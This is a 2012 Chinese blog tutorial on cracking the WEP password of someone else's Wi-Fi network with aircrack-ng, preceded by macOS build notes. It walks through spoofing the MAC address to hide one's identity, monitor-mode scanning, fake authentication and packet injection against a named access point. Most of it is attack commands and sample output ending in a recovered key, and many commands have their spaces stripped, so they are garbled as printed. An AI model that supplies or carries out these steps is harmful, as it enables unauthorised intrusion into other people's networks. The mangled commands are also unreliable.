鲤鱼呦 2012-02-04
下载代码:http://www.aircrack-ng.org
修改common.mak文件
找到 CC=$(TOOL_PREFIX)gcc
改成CC=$(TOOL_PREFIX)gcc-4.0
找到CFLAS ?= -g -W ...
在后面添加 -Wno-strict-aliasing -arch i386 -isysroot /Developer/SDKs/MacOSX10.7.sdk
背景&前提
1.本文所阐述的破解技术是基于WEP格式的加密无线网络。
2.本文假定你使用的是UbuntuLinux操作系统,Windows平台下所用方法与本文类似。
3.本文假定你有一个可以接收无线信号的网卡,同时该网卡支持监听(monitor)模式。
4.本文假定你的网卡可以接收到无线信号,即在你的周围有无线信号。
准备工作
在正式进入破解之前,还是需要做一些准备工作的。
1.安装aircrack-ng无线破解软件
1.打开终端(Applications->Accessories->Terminal)。
2.输入命令:
sudoapt-getinstallaircrack-ng
3.这时aircrack-ng会自动下载并安装。
4.(完成后可在终端中输入以下命令
sudoaircrack-ng--help
来测试是否安装成功)。
5.其实,下载的aircrack-ng不仅仅是“一个”程序,而是一个套件。本文中,我们将会用到其中的:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
2.获取本机无线网卡信息
首先我们应该知道我们的无线网卡在系统中叫什么名字(也就是标识)。
1.输入命令:
sudoifconfig
2.在输出的内容中,我们应该可以看到类似于”wlan0″的标识,如下图所示。
3.wlan0Linkencap:EthernetHWaddr00:22:fa:88:50:4e
4.inet6addr:fe80::20da:a7ff:fe90:a6f5/64Scopeink
5.UPBROADCASTMULTICASTMTU:1500Metric:1
6.RXpackets:1961errors:0dropped:0overruns:0frame:0
7.TXpackets:2123errors:0dropped:0overruns:0carrier:0
8.collisions:0txqueuelen:1000
RXbytes:1838600(1.8MB)TXbytes:473232(473.2KB)
(后文中,wlan0就表示我们要操纵的无线网卡)
9.输出内容HWaddr后便是无线网卡(wlan0)的MAC地址00:22:fa:88:50:4e
3.修改无线网卡地址(推荐)
如果你不想被别人知道你的真实身份的话,建议你修改自己的无线网卡地址(MAC地址)。
在此我们使用macchanger这个程序来修改自己的网卡地址。
1.安装macchanger:
sudoapt-getinstallmacchanger
2.在修改之前,需要把网卡停止:
sudoifconfigwlan0down
3.将自己的网卡地址修改成随机地址:
sudomacchanger-rwlan0
命令中的-r表示将网卡wlan0的网卡地址修改为任意值,我们此时修改为:22:da:a7:90:a6:f5。
CurrentMAC:00:22:fa:88:50:4e(unknown)
FakedMAC:22:da:a7:90:a6:f5(unknown)
4.重新启用无线网卡:
sudoifconfigwlan0up
开始破解
准备工作完成后,便可进入破解工作。
1.将网卡调整到监听模式
在正常状态下,无线网卡是无法侦测到附近电脑与无线接入点之间的通信的。所以为了获取它们之间的通信数据,我们需要开启无线网卡的监听模式。
1.在修改之前通过命令:
iwconfig
来查看现在的网卡信息,并通过如下命令:
sudoairmon-ngstartwlan0
来开启无线网卡wlan0的监听模式。
2.(开启之后的监听网卡名字默认为mon0,可通过命令:
iwconfig
来查看网卡信息,我们会发现现在系统多出一个网卡mon0,状态为:Monitor态)
mon0IEEE802.11bgMode:MonitorFrequency:2.432GHzTx-Power=20dBm
Retrylonglimit:7RTSthrffFragmentthrff
PowerManagementff
2.查看附近无线网络
现在我们就可以查看附近有哪些无线网络了。
1.通过命令:
sudoairodump-ngmon0
来查看无线网络,结果如下所示(经过处理):
CH5][Elapsed:12s][20XX-XX-0210:29
BSSIDPWRBeacons#Data,#/sCHMBENCCIPHERAUTHESSID
00:23:CD:5A:94:12-477520654.WEPWEPzhy
00:25:86:XX:XX:XX-587060654.WEPWEP317
C8:3A:35:XX:XX:XX-752300654eWPA2CCMPPSK415
00:23:CD:XX:XX:XX-752100354.WEPWEP314
00:27:19:XX:XX:XX-732800654.WPA2CCMPPSKTP-LINK_78CFD4
BSSIDSTATIONPWRRateLostPacketsProbes
(notassociated)00:253:XX:XX:XX-700-14236
(notassociated)00:1C:BF:XX:XX:XX-700-113
(notassociated)00:253:XX:XX:XX-560-11472
(notassociated)00:26:82:XX:XX:XX-760-1215FAST
00:23:CD:5A:94:1200:13:02:XX:XX:XX-7648-5402
2.当周围环境中的无线网络接入点基本显示完全后,Ctrl+C结束当前程序。但是不要关闭当前窗口,因为我们还要利用这些数据,为方便下次使用你也可以复制这些数据到文本中。
3.获取指定无线接入点数据包
比如我们要破解上面的一个BSSID为:00:23:CD:5A:94:12的接入点(ESSID为:zhy),我们就需要获取它相应的数据包。
1.打开一个新的终端,并输入命令:
sudoairodump-ngmon0-wmeiyou--bssid00:23:CD:5A:94:12-c6
其中,参数-w指明数据保存文件(meiyou),参数–bssid指明要截取数据包的接入点MAC地址,参数-c指明获取的频道为6。
2.(当前程序不要中止,再打开一个新的终端,进行下一步)
4.对无线接入点进行注入(推荐)
如果你感觉上面数据包截取的数据(#Data项)速度太慢,那么你最好对该接入点进行注入。(注:有时,该方法对某些类型的接入点不太好用)
1.和该接入点进行关联
1.在刚才打开的新终端下,输入命令:
sudoaireplay-ng-10-a00:23:CD:5A:94:12-h22:da:a7:90:a6:f5mon0
其中,参数-1指明这是虚拟认证(Fakeauthentication),参数0含义不明(官方解释为:0reassociationtiminginseconds),参数-a指明接入点MAC地址,参数-h指明本机MAC地址,mon0为本机网卡名称。
2.如果返回结果如下所示,就说明你已经和该接入点关联起来了:
3.09:50:52Waitingforbeaconframe(BSSID:00:23:CD:5A:94:12)onchannel6
4.
5.09:50:52SendingAuthenticationRequest(OpenSystem)[ACK]
6.09:50:52Authenticationsuccessful
7.09:50:52SendingAssociationRequest[ACK]
09:50:52Associationsuccessful:-)(AID:1)
2.对该接入点进行注入
1.通过命令:
sudoaireplay-ng-2-F-p0841-cff:ff:ff:ff:ff:ff-b00:23:CD:5A:94:12-h22:da:a7:90:a6:f5mon0
其中,参数-2指明这是Interactivepacketreplay方式,参数-F指明使用第一个匹配的数据包,参数-p指明数据帧的控制字符,参数-c指明目的MAC地址,参数-b指明接入点MAC地址,参数-h指明源地址MAC地址,mon0为本机网卡名称。
2.如果返回结果如下所示,那么这时,上一个正在截获数据的终端的#Data项数值应该会疯涨,表明注入成功。
3.Savingchosenpacketinreplay_src-0502-095620.cap
4.Youshouldalsostartairodump-ngtocapturereplies.
5.
Sent3152packets...(499pps)
6.(当前程序不要中止,因为我们需要一直进行注入,直到下一步的破解成功为止)
5.破解WEP密码
现在,airodump-ng命令正在截获指定接入点的通信数据,aireplay-ng命令正在对指定接入点进行注入,以增加数据量。那么现在,我们就可以通过另一个命令来处理这些正在截获的数据,以求破解其中的WEP密码。
1.打开一个新的终端,输入命令:
lsmeiyou*
列出了刚才保存的数据文件(meiyou-01.cap),如果你多次截取的话,应该会有多个cap文件。
2.通过如下命令,加载数据截取文件,破解WEP密码:
sudoaircrack-ngmeiyou-01.cap
如果你需要加载多个文件,同时进行破解,输入如下命令:
sudoaircrack-ngmeiyou-*.cap
3.现在aircrack-ng程序正在对数据截取文件进行破解,企图找到WEP密码,如果没有找到密码,aircrack-ng程序会等到另一终端截(airodump-ng)取到5000个数据后,重新进行破解。
4.(现在你应该开着3个终端,一个正在截取接入点数据,一个正在对接入点进行注入,还有一个正在对所截取的文件进行WEP密码破解。如果最后一个终端显示出密码话,进入下一步收尾工作)
5.如果一切顺利,密码会自动显示出来:
6.Aircrack-ng1.1
7.
8.[00:01:41]Tested87keys(got25012IVs)
9.
10.KBdepthbyte(vote)
11.00/162(37120)11(33536)4C(33536)70(33536)87(33024)
12.10/161(39168)27(35072)AF(34304)CC(34048)83(33792)
13.23/51F(33792)2C(33280)3E(33280)82(33024)9F(33024)
14.30/364(34816)58(34048)B5(34048)6A(33280)7C(33280)
15.41/775(34304)50(33792)F1(33792)10(33536)23(33536)
16.
17.KEYFOUND![31:32:33:34:35](ASCII:12345)
Decryptedcorrectly:100%
6.收尾工作
1.终止aireplay-ng程序对无线接入点的注入(Ctrl+Z终止程序)
2.终止airodump-ng程序对数据的截获(Ctrl+C终止程序)
3. 至此,完成对指定接入点的WEP密码破解。http://rhodzy.com/easily-install-aircrack-mac-os-x
http://blog.nightlionsecurity.com/hacking/2012/03/guide-to-install-aircrack-ng-on-mac-osx-10-7-lion/